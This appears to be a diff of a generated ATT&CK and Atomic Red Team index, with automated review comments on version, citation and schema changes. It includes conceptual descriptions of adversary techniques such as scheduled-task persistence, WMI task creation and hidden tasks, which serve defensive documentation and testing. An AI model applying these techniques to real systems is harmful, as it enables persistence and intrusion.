description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
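Review bot: the rewrite drops the paragraph on the deprecated `at` utility (and its note that `at.exe` cannot see tasks created with `schtasks`), so this description no longer cross-references T1053.002; in its place the text adds the WMI and `Invoke-CimMethod` / `PS_ScheduledTask` paths with two new citation keys, `Stack Overflow` and `Red Canary - Atomic Red Team`, both of which get matching `source_name` entries later in the diff. The defender-relevant point of the new text is that these paths register tasks without a `schtasks.exe` process, so detection should lean on the registration artefacts already listed under `x_mitre_data_sources` (`'Windows Registry: Windows Registry Key Creation'`, `'File: File Modification'`) rather than on command-line telemetry alone.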
@@ -41885,7 +42202,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -41917,8 +42234,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -41932,6 +42249,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -41944,11 +42265,14 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -42327,7 +42651,7 @@ execution:
schtasks /Delete /TN "#{task_name}" /F
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -42393,7 +42717,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
@@ -42704,7 +43027,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests:
- name: ESXi - Install a custom VIB on an ESXi host
@@ -42771,61 +43093,7 @@ execution:
elevation_required: false
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
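Review bot: most of this hunk is key reordering rather than content: the removed `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created` and `external_references` blocks all reappear after `x_mitre_detection` in the following hunk, with the references re-sorted by `source_name`. The substantive deltas are `modified` advancing to 2024-07-30, `x_mitre_version` 2.1 to 2.2, the new `x_mitre_remote_support: false` and `revoked: false`, and removal of the deprecated `x_mitre_permissions_required` list. One thing to leave alone: the misspelt `source_name: JScrip May 2018` is preserved on both sides and should not be corrected here in isolation, because `source_name` keys are matched byte for byte against the `(Citation: ...)` markers in the description, and fixing one without the other breaks the reference.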
@@ -42838,26 +43106,78 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests:
- name: JScript execution to gather local computer information via cscript
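Review bot: `x_mitre_permissions_required` (`User`, `Administrator`, `SYSTEM`) is deleted from T1059.007 with no replacement key, and T1569.001 further down loses the same field, yet T1053.003 keeps `x_mitre_permissions_required: - User` as unchanged context. If the field was dropped because the upstream objects no longer carry it, say so in the PR description so anyone filtering on it knows the removal is deliberate; if the objects were pulled from different bundle versions, regenerate them from one bundle. Separately, `source_name: JScrip May 2018` is an upstream typo reproduced verbatim; leave it alone here, since hand edits to generated YAML are lost on the next regeneration.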
@@ -42913,7 +43233,7 @@ execution:
name: command_prompt
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -42971,9 +43291,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
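Review bot: `spec_version: '2.1'` is removed from every technique object in this patch (here for T1053.007, and again for T1559.002, T1204.002, T1053, T1059.002, T1106, T1059.009, T1610, T1059, T1609 and the rest below) while `x_mitre_attack_spec_version` moves from 3.1.0 to 3.2.0. That changes the shape of each `technique` mapping: any reader of `technique.spec_version` now gets a missing key. Please state in the PR description which ATT&CK bundle and version the regeneration used, and call the key removal out as a breaking change for downstream consumers.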
@@ -43065,7 +43384,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests:
- name: Execute Commands
@@ -43138,15 +43456,15 @@ execution:
name: manual
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -43174,7 +43492,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -43194,9 +43512,8 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests:
- name: OSTap Style Macro Execution
@@ -43673,26 +43990,7 @@ execution:
name: powershell
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
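Review bot: most of the T1053.003 change is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted from the head of the object here and re-added with the same values near its tail, and T1569.001 and T1559.003 get the same treatment further down. If the generator can emit keys in a fixed order (for example by serialising with sorted keys, or in the upstream object's own order), regenerations would produce a diff a reviewer can actually read; as it stands the real changes (`modified`, `x_mitre_version` 1.1 to 1.2, `x_mitre_attack_spec_version` 3.2.0) are buried in churn.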
@@ -43709,6 +44007,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -43719,9 +44018,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -43729,8 +44032,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -43770,7 +44089,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
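Review bot: `modified` for T1559.001 goes backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-07-26T22:51:20.448Z'`, and T1059.008 below does the same (`'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`), while every other object in this patch moves forward to a 2024 timestamp. Confirm these are the actual last-modified values of the objects in the bundle being used and not stale copies, since a regressing `modified` makes any tooling that syncs on that field treat this revision as older than the one it already holds.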
@@ -43795,12 +44114,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
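Review bot: for T1559.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing in this hunk reinstates the latter, whereas the other techniques in the patch end up with `x_mitre_attack_spec_version: 3.2.0`. Check that the key still appears elsewhere in the T1559.001 object after this change; if it does not, this object becomes the only one without a spec version, which looks like regeneration from a source object lacking the field rather than an intended removal.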
@@ -43880,11 +44197,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -43944,12 +44260,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -44047,9 +44362,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -44066,7 +44381,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests:
- name: Execution through API - CreateProcess
@@ -44147,14 +44461,14 @@ execution:
cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -44163,7 +44477,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -44200,11 +44514,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -44241,11 +44554,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
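Review bot: the platform list for T1059.009 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, and T1059 gets the same substitution further down. Any index or filter that selects techniques by the old `x_mitre_platforms` values will silently stop matching these two techniques, so the PR should include, or point to, the matching update of whatever is keyed on platform names.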
@@ -44264,13 +44576,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -44349,12 +44660,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
